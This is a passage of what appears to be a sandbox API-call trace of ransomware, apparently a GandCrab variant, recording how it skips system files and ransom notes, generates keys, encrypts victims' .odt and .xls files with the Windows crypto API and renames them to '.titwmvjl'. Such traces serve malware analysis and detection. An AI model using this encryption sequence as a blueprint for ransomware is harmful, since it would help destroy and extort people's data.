returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fTVPj4GiPQZC6V3o4.odt" [0090.236] lstrlenW (lpString=".titwmvjl") returned 9 [0090.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fTVPj4GiPQZC6V3o4.odt") returned 145 [0090.236] VirtualAlloc (lpAddress=0x0, dwSize=0x162, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.236] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fTVPj4GiPQZC6V3o4.odt.titwmvjl") returned 154 [0090.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fTVPj4GiPQZC6V3o4.odt") returned 145 [0090.236] lstrlenW (lpString=".odt") returned 4 [0090.236] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.236] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".odt ") returned 5 [0090.236] lstrcmpiW (lpString1=".odt", lpString2=".titwmvjl") returned -1 [0090.236] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fTVPj4GiPQZC6V3o4.odt") returned 145 [0090.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fTVPj4GiPQZC6V3o4.odt") returned 145 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="desktop.ini") returned 1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="autorun.inf") returned 1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="ntuser.dat") returned -1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="iconcache.db") returned -1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="bootsect.bak") returned 1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="boot.ini") returned 1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="ntuser.dat.log") returned -1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="thumbs.db") returned -1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="KRAB-DECRYPT.html") returned -1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="CRAB-DECRYPT.html") returned 1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="ntldr") returned -1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="NTDETECT.COM") returned -1 [0090.237] lstrcmpiW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="Bootfont.bin") returned 1 [0090.237] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fTVPj4GiPQZC6V3o4.odt") returned 145 [0090.237] lstrlenW (lpString=".odt") returned 4 [0090.237] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.237] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".odt ") returned 5 [0090.237] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.237] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.237] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fTVPj4GiPQZC6V3o4.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\ftvpj4gipqzc6v3o4.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0090.238] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.238] ReadFile (in: hFile=0x2dc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e264*=0x21c, lpOverlapped=0x0) returned 1 [0090.238] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.239] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.240] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.240] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.240] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.240] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e220 | out: pbBuffer=0x259e220) returned 1 [0090.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.240] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.240] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.241] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.241] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.242] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.242] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.242] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.242] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e240 | out: pbBuffer=0x259e240) returned 1 [0090.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.242] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.242] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.243] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.243] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.244] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503478) returned 1 [0090.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.244] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.244] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.245] GetLastError () returned 0x0 [0090.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.245] CryptDestroyKey (hKey=0x503478) returned 1 [0090.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.245] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.245] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.247] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x5037b8) returned 1 [0090.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.247] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.247] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.247] GetLastError () returned 0x0 [0090.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.247] CryptDestroyKey (hKey=0x5037b8) returned 1 [0090.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.248] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.248] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.248] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.248] ReadFile (in: hFile=0x2dc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e264*=0x8846, lpOverlapped=0x0) returned 1 [0090.254] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xffff77ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.254] WriteFile (in: hFile=0x2dc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8846, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e248*=0x8846, lpOverlapped=0x0) returned 1 [0090.256] WriteFile (in: hFile=0x2dc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e248*=0x21c, lpOverlapped=0x0) returned 1 [0090.257] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.261] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.261] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.261] CloseHandle (hObject=0x2dc) returned 1 [0090.262] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fTVPj4GiPQZC6V3o4.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\ftvpj4gipqzc6v3o4.odt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fTVPj4GiPQZC6V3o4.odt.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\ftvpj4gipqzc6v3o4.odt.titwmvjl"), dwFlags=0x1) returned 1 [0090.263] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.263] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0090.263] lstrcmpW (lpString1="JsURb8PXUUyeqY.xls", lpString2=".") returned 1 [0090.263] lstrcmpW (lpString1="JsURb8PXUUyeqY.xls", lpString2="..") returned 1 [0090.263] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\", lpString2="JsURb8PXUUyeqY.xls" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\JsURb8PXUUyeqY.xls") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\JsURb8PXUUyeqY.xls" [0090.263] lstrlenW (lpString=".titwmvjl") returned 9 [0090.263] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\JsURb8PXUUyeqY.xls") returned 142 [0090.263] VirtualAlloc (lpAddress=0x0, dwSize=0x15c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.263] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\JsURb8PXUUyeqY.xls.titwmvjl") returned 151 [0090.263] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\JsURb8PXUUyeqY.xls") returned 142 [0090.263] lstrlenW (lpString=".xls") returned 4 [0090.263] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.263] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xls ") returned 5 [0090.264] lstrcmpiW (lpString1=".xls", lpString2=".titwmvjl") returned 1 [0090.264] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\JsURb8PXUUyeqY.xls") returned 142 [0090.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\JsURb8PXUUyeqY.xls") returned 142 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="desktop.ini") returned 1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="autorun.inf") returned 1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="ntuser.dat") returned -1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="iconcache.db") returned 1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="bootsect.bak") returned 1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="boot.ini") returned 1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="ntuser.dat.log") returned -1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="thumbs.db") returned -1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="KRAB-DECRYPT.html") returned -1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="CRAB-DECRYPT.html") returned 1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="ntldr") returned -1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="NTDETECT.COM") returned -1 [0090.264] lstrcmpiW (lpString1="JsURb8PXUUyeqY.xls", lpString2="Bootfont.bin") returned 1 [0090.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\JsURb8PXUUyeqY.xls") returned 142 [0090.264] lstrlenW (lpString=".xls") returned 4 [0090.264] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.264] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xls ") returned 5 [0090.264] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.265] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.265] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\JsURb8PXUUyeqY.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\jsurb8pxuuyeqy.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0090.265] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.265] ReadFile (in: hFile=0x2dc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e264*=0x21c, lpOverlapped=0x0) returned 1 [0090.266] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.266] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.267] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.267] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.267] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.267] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e220 | out: pbBuffer=0x259e220) returned 1 [0090.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.268] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.268] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.268] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.269] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.269] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.269] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.269] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e240 | out: pbBuffer=0x259e240) returned 1 [0090.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.270] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.270] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.270] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.271] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503778) returned 1 [0090.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.271] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.272] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.272] GetLastError () returned 0x0 [0090.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.272] CryptDestroyKey (hKey=0x503778) returned 1 [0090.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.272] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.272] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.273] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503778) returned 1 [0090.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.274] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.274] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.274] GetLastError () returned 0x0 [0090.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.274] CryptDestroyKey (hKey=0x503778) returned 1 [0090.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.274] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.274] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.275] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.275] ReadFile (in: hFile=0x2dc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e264*=0x187e1, lpOverlapped=0x0) returned 1 [0090.282] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffe781f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.282] WriteFile (in: hFile=0x2dc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x187e1, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e248*=0x187e1, lpOverlapped=0x0) returned 1 [0090.284] WriteFile (in: hFile=0x2dc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e248*=0x21c, lpOverlapped=0x0) returned 1 [0090.285] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.289] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.290] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.290] CloseHandle (hObject=0x2dc) returned 1 